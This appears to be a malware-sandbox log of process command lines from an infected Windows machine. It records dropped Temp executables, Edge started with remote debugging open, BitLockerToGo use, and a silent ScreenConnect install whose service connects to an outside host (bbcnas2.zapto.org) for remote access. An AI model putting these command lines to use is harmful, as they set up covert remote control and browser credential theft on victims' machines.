"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3324 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3856 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3840 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe

"C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe"

C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe

"C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe"

C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe

"C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding CE51BD9F7297D9F3E384E5340B875712 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI264B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240723578 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\10038820101\VBUN8fn.exe

"C:\Users\Admin\AppData\Local\Temp\10038820101\VBUN8fn.exe"

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9FF11A8C874A3767102789C203F388A9

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 856F5DDD804D801542D02D11EFCE1C3F E Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=feb3dc3c-6578-4232-a238-57d465576d77&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "4bd7e4bb-2cdd-4927-b869-4434b7a8b7ef" "User"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "30038d78-55a1-4c5d-a8b5-f28c1a0333a6" "System"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

